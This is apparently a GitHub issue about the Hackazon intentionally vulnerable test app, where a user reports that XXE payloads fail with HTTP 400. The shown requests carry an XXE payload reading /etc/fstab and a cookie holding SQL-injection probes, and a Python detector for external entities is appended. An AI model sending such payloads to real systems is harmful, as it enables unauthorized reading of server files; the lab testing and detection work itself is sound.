This repository has been archived by the owner on May 18, 2021. It is now read-only.

Issues with XXE #25

Open
artsalmon opened this issue Apr 8, 2020 · 0 comments

artsalmon commented Apr 8, 2020

XXE vulnerabilities seem not to be functioning.

I have verified that XXE is enabled in the vulnerabilities.md file. I have also logged in to the admin page and ensured that there are pages where the XXE vulnerability is enabled. I turned it on in every location that I could, just in case. I verified the PHP files in the config location to ensure that XXE was set to true for the location I needed. I enabled XXE for the Cart/View area.

I set up Burp to intercept the HTTP GET requests, and I captured the request below.

Original request:

```http
GET /success.txt HTTP/1.1
Host: 192.168.198.145
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.198.145/cart/view
Cookie: visited_products=%2C208%2C101%2C18%2C188%2C1+or+1%3D1%2C1%3D1%2C64%2C1%2C72%2C101and+1%3D1%2C81%2C76%2C78%2C163%2C21%2C16%2C; PHPSESSID=9s2mrcem0stgqk0h9c0tvtenf1
```

I modified the request to include the XML example code from the vulnerability.

Modified request:

```http
GET /success.txt HTTP/1.1
Host: 192.168.198.145
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml
Referer: http://192.168.198.145/cart/view
Cookie: visited_products=%2C208%2C101%2C18%2C188%2C1+or+1%3D1%2C1%3D1%2C64%2C1%2C72%2C101and+1%3D1%2C81%2C76%2C78%2C163%2C21%2C16%2C; PHPSESSID=9s2mrcem0stgqk0h9c0tvtenf1

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [<!ENTITY goodies SYSTEM "file:///etc/fstab">]>
<roottag>&goodies;
```

I have also modified the goodies entity to see if the passwd file would display.

I only get an HTTP 400 error.

I have cleared the cache, I have tried doing this in a VM with no other content, and I ensured that Firefox was updated.

Has anyone tested and/or seen XXE vulnerabilities function with Hackazon?
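As an added example (not code from Hackazon or from the issue author), the check below is what a defender reviewing proxy logs or writing a WAF rule would run over a raw request like the one above: it splits the request into method, path, headers and body, flags any external (SYSTEM/PUBLIC) entity declared in the body, and notes when the payload rode on a GET request, which most servers never hand to an XML parser. The embedded request is constructed from the issue's modified request with the display quote marks removed.

```python
import re

# Constructed sample: the issue's modified request, trimmed to the relevant headers.
SAMPLE_REQUEST = (
    "GET /success.txt HTTP/1.1\r\n"
    "Host: 192.168.198.145\r\n"
    "Content-Type: text/xml\r\n"
    "Connection: close\r\n"
    "\r\n"
    '<?xml version="1.0" encoding="utf-8"?>\n'
    '<!DOCTYPE roottag [<!ENTITY goodies SYSTEM "file:///etc/fstab">]>\n'
    "<roottag>&goodies;</roottag>\n"
)

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# Entity declarations that reference an external resource; the first quoted
# literal is the system identifier for SYSTEM and the public identifier for PUBLIC.
EXTERNAL_ENTITY_RE = re.compile(
    r'<!ENTITY\s+(?:%\s*)?(?P<name>[\w.-]+)\s+(?:SYSTEM|PUBLIC)\s+"(?P<uri>[^"]*)"',
    re.IGNORECASE,
)


def split_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, path, headers, body


def inspect_request(raw: str) -> dict:
    """Report XXE indicators found in the request body."""
    method, path, headers, body = split_request(raw)
    entities = [(m.group("name"), m.group("uri")) for m in EXTERNAL_ENTITY_RE.finditer(body)]
    return {
        "method": method,
        "path": path,
        "content_type": headers.get("content-type", ""),
        "has_doctype": bool(DOCTYPE_RE.search(body)),
        "external_entities": entities,
        "body_on_get": method == "GET" and bool(body.strip()),
        "flag": bool(entities),
    }


if __name__ == "__main__":
    print(inspect_request(SAMPLE_REQUEST))
```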
